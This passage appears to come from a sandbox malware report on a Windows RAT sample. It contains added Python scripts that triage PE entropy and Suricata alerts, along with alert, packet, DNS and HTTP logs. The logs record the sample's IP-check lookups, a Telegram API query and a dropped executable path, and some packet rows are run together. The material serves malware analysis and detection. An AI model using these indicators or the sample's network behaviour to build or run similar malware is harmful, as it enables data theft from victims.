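    on it and it jumps through the single IAT slot, which holds mscoree!_CorExeMain."""
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        return None
    return struct.unpack_from("<I", stub, 2)[0]


def is_clr_entry(stub: bytes, image_base: int, iat_rva: int, iat_size: int,
                 com_descriptor_size: int) -> bool:
    """True when the entry point jumps through the IAT and a CLR header is present.
    A native binary that merely imports mscoree.dll fails this check."""
    target = decode_jmp_indirect(stub)
    if target is None or com_descriptor_size == 0:
        return False
    return image_base + iat_rva <= target < image_base + iat_rva + iat_size


def suspicious_sections(sections, threshold: float = 7.0, min_raw: int = 0x1000) -> list[str]:
    """Sections whose entropy is near the 8-bit ceiling. IL and metadata sit well
    below this; .text or .rsrc at about 7.7 usually holds compressed or encrypted
    payload. Sections smaller than min_raw are skipped because the entropy of a
    few hundred bytes is statistically meaningless."""
    return [s["name"] for s in sections
            if s["raw_size"] >= min_raw and s["entropy"] >= threshold]


def triage() -> dict:
    """Run the three checks on the values copied from the report."""
    return {
        "clr_entry": is_clr_entry(ENTRY_STUB, IMAGE_BASE, IAT_RVA, IAT_SIZE, COM_DESCRIPTOR_SIZE),
        "jmp_target": decode_jmp_indirect(ENTRY_STUB),
        "high_entropy_sections": suspicious_sections(SECTIONS),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
    # the metrics themselves, on constructed data
    print("entropy(zeros) =", shannon_entropy(b"\x00" * 4096))
    print("entropy(0..255) =", shannon_entropy(bytes(range(256))))
    print("zlib_complexity(zeros) =", zlib_complexity(b"\x00" * 4096))
```

Run against a real file, the same functions take `section.get_data()` and the bytes at the entry point from pefile; the constants above stand in for that so the script runs offline. The threshold of 7.0 is a triage heuristic, not a rule: legitimately signed installers with embedded compressed resources trip it too, which is why the entry-stub and CLR-header checks are kept separate from the entropy check.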
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-07T06:20:06.716853+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49774 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:06.716853+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49765 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:06.716853+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49775 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:21.398753+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49736 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:22.142526+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49752 | TCP
2024-11-07T06:20:23.206957+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49736 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:26.617516+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49736 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:27.333981+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49764 | 188.114.97.3 | 443 | TCP
2024-11-07T06:20:29.305022+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49769 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:30.034678+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49773 | 188.114.97.3 | 443 | TCP
2024-11-07T06:20:30.820638+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49776 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:31.528000+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49778 | 188.114.97.3 | 443 | TCP
2024-11-07T06:20:59.576883+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49784 | TCP
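Two things matter when reading this table. First, which endpoints the analysis host itself opened connections to: the ETPRO MALWARE hits have 192.168.2.4 as source and point at 193.122.130.0:80 and 188.114.97.3:443, so those are the download and C2 candidates to block and pivot on. Second, the two ET EXPLOIT hits run the other way, from a remote port 443 into an ephemeral port on the analysis host; that is the server-to-client leg of a TLS session, where a plaintext content rule for a CAB parser bug has nothing meaningful to match, so they are false-positive candidates to verify rather than evidence that anything exploited the sandbox. The script below is an added example, not part of the Joe Sandbox report: it parses the rows above (copied here in a pipe-separated layout that is this example's own convention, with the analysis host's address 192.168.2.4 taken from the table), groups outbound alerts by destination endpoint and SID, and separates the inbound EXPLOIT hits.

```python
"""Triage of a sandbox's Suricata alert table: endpoints the analysis host itself
contacted versus inbound alerts on return traffic.

Added example, not part of the Joe Sandbox report. Rows are copied from the alert
table; the pipe-separated layout and the sandbox_ip parameter are this example's
own conventions.
"""
from __future__ import annotations

from collections import Counter, defaultdict
from typing import NamedTuple

SANDBOX_IP = "192.168.2.4"  # the analysis host's address, as seen in the table

ALERT_ROWS = """\
2024-11-07T06:20:06.716853+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.4|49774|193.122.130.0|80|TCP
2024-11-07T06:20:06.716853+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.4|49765|193.122.130.0|80|TCP
2024-11-07T06:20:06.716853+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.4|49775|193.122.130.0|80|TCP
2024-11-07T06:20:21.398753+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.4|49736|193.122.130.0|80|TCP
2024-11-07T06:20:22.142526+0100|2022930|ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow|1|4.245.163.56|443|192.168.2.4|49752|TCP
2024-11-07T06:20:23.206957+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.4|49736|193.122.130.0|80|TCP
2024-11-07T06:20:26.617516+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.4|49736|193.122.130.0|80|TCP
2024-11-07T06:20:27.333981+0100|2803305|ETPRO MALWARE Common Downloader Header Pattern H|3|192.168.2.4|49764|188.114.97.3|443|TCP
2024-11-07T06:20:29.305022+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.4|49769|193.122.130.0|80|TCP
2024-11-07T06:20:30.034678+0100|2803305|ETPRO MALWARE Common Downloader Header Pattern H|3|192.168.2.4|49773|188.114.97.3|443|TCP
2024-11-07T06:20:30.820638+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.4|49776|193.122.130.0|80|TCP
2024-11-07T06:20:31.528000+0100|2803305|ETPRO MALWARE Common Downloader Header Pattern H|3|192.168.2.4|49778|188.114.97.3|443|TCP
2024-11-07T06:20:59.576883+0100|2022930|ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow|1|20.109.210.53|443|192.168.2.4|49784|TCP
"""


class Alert(NamedTuple):
    ts: str
    sid: int
    signature: str
    severity: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str

    @property
    def category(self) -> str:
        """ET rule-set category: 'ETPRO MALWARE ...' / 'ET EXPLOIT ...' -> second word."""
        return self.signature.split()[1]


def parse_alerts(text: str) -> list[Alert]:
    """Parse pipe-separated rows into Alert records; reject malformed rows loudly."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split("|")
        if len(f) != 9:
            raise ValueError(f"malformed alert row: {line!r}")
        alerts.append(Alert(f[0], int(f[1]), f[2], int(f[3]),
                            f[4], int(f[5]), f[6], int(f[7]), f[8]))
    return alerts


def contacted_endpoints(alerts, sandbox_ip: str = SANDBOX_IP) -> dict[tuple[str, int], Counter]:
    """(dst_ip, dst_port) -> Counter of SIDs, for alerts where the analysis host is
    the source. These are endpoints the sample (or something it spawned) chose to
    talk to: the download / C2 candidates worth blocking and pivoting on."""
    out: dict[tuple[str, int], Counter] = defaultdict(Counter)
    for a in alerts:
        if a.src_ip == sandbox_ip:
            out[(a.dst_ip, a.dst_port)][a.sid] += 1
    return dict(out)


def inbound_exploit_alerts(alerts, sandbox_ip: str = SANDBOX_IP) -> list[Alert]:
    """EXPLOIT-category alerts whose source is a remote port 443 and whose
    destination is an ephemeral port on the analysis host: the server-to-client
    leg of a TLS session. A plaintext content rule matching inside TLS records is
    coincidence, not evidence of the CVE; verify before reporting it."""
    return [a for a in alerts
            if a.category == "EXPLOIT" and a.dst_ip == sandbox_ip
            and a.src_port == 443 and a.dst_port >= 49152]


def triage(text: str = ALERT_ROWS) -> dict:
    """Summarise one alert table."""
    alerts = parse_alerts(text)
    return {
        "total": len(alerts),
        "endpoints": contacted_endpoints(alerts),
        "inbound_exploit": inbound_exploit_alerts(alerts),
    }


if __name__ == "__main__":
    result = triage()
    for (ip, port), sids in sorted(result["endpoints"].items()):
        print(f"{ip}:{port}  " + ", ".join(f"sid {s} x{n}" for s, n in sids.items()))
    for a in result["inbound_exploit"]:
        print(f"verify before reporting: {a.ts} sid {a.sid} from {a.src_ip}:{a.src_port}")
```

The direction test is deliberately the analysis host's address rather than the port, because a sample that listens locally would invert the port heuristic; the ephemeral-port lower bound of 49152 is the Windows default dynamic range and is the only assumption beyond the table itself.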
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 7, 2024 06:20:06.778352022 CET | 49733 | 80 | 192.168.2.4 | 193.122.130.0
Nov 7, 2024 06:20:06.783163071 CET | 80 | 49733 | 193.122.130.0 | 192.168.2.4
Nov 7, 2024 06:20:06.783247948 CET | 49733 | 80 | 192.168.2.4 | 193.122.130.0
Nov 7, 2024 06:20:06.783490896 CET | 49733 | 80 | 192.168.2.4 | 193.122.130.0
Nov 7, 2024 06:20:06.788245916 CET | 80 | 49733 | 193.122.130.0 | 192.168.2.4
Nov 7, 2024 06:20:10.719106913 CET | 49736 | 80 | 192.168.2.4 | 193.122.130.0
Nov 7, 2024 06:20:10.725519896 CET | 80 | 49736 | 193.122.130.0 | 192.168.2.4
Nov 7, 2024 06:20:10.725591898 CET | 49736 | 80 | 192.168.2.4 | 193.122.130.0
Nov 7, 2024 06:20:10.725902081 CET | 49736 | 80 | 192.168.2.4 | 193.122.130.0
Nov 7, 2024 06:20:10.732968092 CET | 80 | 49736 | 193.122.130.0 | 192.168.2.4
Nov 7, 2024 06:20:16.748151064 CET | 80 | 49733 | 193.122.130.0 | 192.168.2.4
Nov 7, 2024 06:20:16.789438009 CET | 49733 | 80 | 192.168.2.4 | 193.122.130.0
Nov 7, 2024 06:20:19.682492018 CET | 80 | 49736 | 193.122.130.0 | 192.168.2.4
Nov 7, 2024 06:20:19.726871967 CET | 49736 | 80 | 192.168.2.4 | 193.122.130.0
Nov 7, 2024 06:20:19.746239901 CET | 49736 | 80 | 192.168.2.4 | 193.122.130.0
Nov 7, 2024 06:20:19.751032114 CET | 80 | 49736 | 193.122.130.0 | 192.168.2.4
Nov 7, 2024 06:20:21.343811035 CET | 80 | 49736 | 193.122.130.0 | 192.168.2.4
Nov 7, 2024 06:20:21.398752928 CET | 49736 | 80 | 192.168.2.4 | 193.122.130.0
Nov 7, 2024 06:20:21.405673981 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Nov 7, 2024 06:20:21.405699015 CET | 443 | 49755 | 188.114.97.3 | 192.168.2.4
Nov 7, 2024 06:20:21.405950069 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
Nov 7, 2024 06:20:21.414058924 CET | 49755 | 443 | 192.168.2.4 | 188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:21.414072037 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.024025917 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.024162054 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.027498007 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.027508020 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.027775049 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.070625067 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.094459057 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.139333010 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.463103056 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.463198900 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.463253021 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.469649076 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.474281073 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:22.479046106 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.160422087 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.165481091 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.165508986 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.165597916 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.165841103 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.165855885 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.176645994 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.187103033 CET49758443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.187125921 CET44349758188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.187189102 CET49758443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.187414885 CET49758443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:23.187428951 CET44349758188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.198426008 CET44349758188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:23.206957102 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:23.211827040 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.561839104 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.563152075 CET49763443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.563177109 CET44349763188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.563242912 CET49763443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.563541889 CET49763443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.563556910 CET44349763188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.574599028 CET44349763188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.575437069 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.575472116 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.575745106 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.575745106 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:26.575777054 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:26.617516041 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.184844971 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.184952974 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:27.186398983 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:27.186410904 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.186695099 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.195014000 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:27.239331961 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.333988905 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.334095955 CET44349764188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.334142923 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:27.334678888 CET49764443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:27.338623047 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.339941978 CET4976580192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.343849897 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.343904972 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.344732046 CET8049765193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.344803095 CET4976580192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.344877005 CET4976580192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.349620104 CET8049765193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.349837065 CET8049765193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.351560116 CET4976680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.356381893 CET8049766193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.356460094 CET4976680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.356549025 CET4976680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.361315012 CET8049766193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.361447096 CET8049766193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.364866018 CET4976780192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.369792938 CET8049767193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.369852066 CET4976780192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.369955063 CET4976780192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.374703884 CET8049767193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.374862909 CET8049767193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.375596046 CET4976880192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.380482912 CET8049768193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.380536079 CET4976880192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.380649090 CET4976880192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.385441065 CET8049768193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.385586977 CET8049768193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.388842106 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.393670082 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:27.393733978 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.393840075 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:27.398575068 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.053877115 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.057765007 CET49770443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.057794094 CET44349770188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.057873011 CET49770443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.058195114 CET49770443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.058207035 CET44349770188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.073259115 CET44349770188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.074331045 CET49771443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.074356079 CET44349771188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.074479103 CET49771443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.074704885 CET49771443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.074718952 CET44349771188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.090410948 CET44349771188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.096179962 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:29.103669882 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.254576921 CET8049769193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.256329060 CET49772443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.256369114 CET44349772188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.256433010 CET49772443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.256805897 CET49772443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.256820917 CET44349772188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.273308039 CET44349772188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.274797916 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.274832010 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.274950981 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.275135994 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.275150061 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.305022001 CET4976980192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:29.891060114 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.891182899 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.893037081 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.893047094 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.893328905 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:29.894804001 CET49773443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:29.935332060 CET44349773188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:30.034693956 CET44349773188.114.97.3192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 7, 2024 06:20:06.716852903 CET | 60847 | 53 | 192.168.2.4 | 1.1.1.1
Nov 7, 2024 06:20:06.723737001 CET | 53 | 60847 | 1.1.1.1 | 192.168.2.4
Nov 7, 2024 06:20:21.396397114 CET | 64654 | 53 | 192.168.2.4 | 1.1.1.1
Nov 7, 2024 06:20:21.404567957 CET | 53 | 64654 | 1.1.1.1 | 192.168.2.4
Nov 7, 2024 06:20:31.541201115 CET | 51777 | 53 | 192.168.2.4 | 1.1.1.1
Nov 7, 2024 06:20:31.549523115 CET | 53 | 51777 | 1.1.1.1 | 192.168.2.4
Nov 7, 2024 06:20:37.075808048 CET | 59038 | 53 | 192.168.2.4 | 1.1.1.1
Nov 7, 2024 06:20:37.667145014 CET | 53 | 59038 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 7, 2024 06:20:06.716852903 CET | 192.168.2.4 | 1.1.1.1 | 0xd53 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:21.396397114 CET | 192.168.2.4 | 1.1.1.1 | 0xdf57 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:31.541201115 CET | 192.168.2.4 | 1.1.1.1 | 0xb289 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:37.075808048 CET | 192.168.2.4 | 1.1.1.1 | 0xa192 | Standard query (0) | mail.rasextraders.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 7, 2024 06:20:06.723737001 CET | 1.1.1.1 | 192.168.2.4 | 0xd53 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 06:20:06.723737001 CET | 1.1.1.1 | 192.168.2.4 | 0xd53 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:06.723737001 CET | 1.1.1.1 | 192.168.2.4 | 0xd53 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:06.723737001 CET | 1.1.1.1 | 192.168.2.4 | 0xd53 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:06.723737001 CET | 1.1.1.1 | 192.168.2.4 | 0xd53 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:06.723737001 CET | 1.1.1.1 | 192.168.2.4 | 0xd53 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:21.404567957 CET | 1.1.1.1 | 192.168.2.4 | 0xdf57 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:21.404567957 CET | 1.1.1.1 | 192.168.2.4 | 0xdf57 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:31.549523115 CET | 1.1.1.1 | 192.168.2.4 | 0xb289 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 06:20:37.667145014 CET | 1.1.1.1 | 192.168.2.4 | 0xa192 | No error (0) | mail.rasextraders.com | rasextraders.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 06:20:37.667145014 CET | 1.1.1.1 | 192.168.2.4 | 0xa192 | No error (0) | rasextraders.com | | 205.147.111.116 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                                                    • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 193.122.130.0 | 80 | 7176 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe

Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 06:20:06.783490896 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 7, 2024 06:20:16.748151064 CET | 730 | IN | HTTP/1.1 502 Bad Gateway
Date: Thu, 07 Nov 2024 05:20:16 GMT
Content-Type: text/html
Content-Length: 547
Connection: keep-alive
X-Request-ID: cad3cb60f65a3c51abd08489fccfb8ff
                                                                                                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49736 | 193.122.130.0 | 80 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 06:20:10.725902081 CET | 151 | OUT | GET / HTTP/1.1
